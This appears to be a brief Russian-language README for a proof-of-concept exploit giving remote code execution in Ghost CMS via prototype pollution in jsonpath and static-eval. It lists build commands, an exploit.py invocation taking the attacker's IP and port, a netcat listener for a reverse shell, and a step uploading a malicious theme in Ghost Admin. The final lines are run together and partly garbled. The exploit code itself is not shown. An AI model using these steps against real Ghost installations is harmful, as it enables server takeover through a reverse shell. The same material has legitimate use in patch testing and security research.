
Эксплойт proof-of-concept для удалённого выполнения кода в Ghost CMS через prototype pollution в jsonpath и static-eval, с настройкой уязвимой среды и инструкциями по использованию.
RCE в Ghost CMS через цепочку прототипов jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip в Ghost Admin → Settings → Designrce/rce/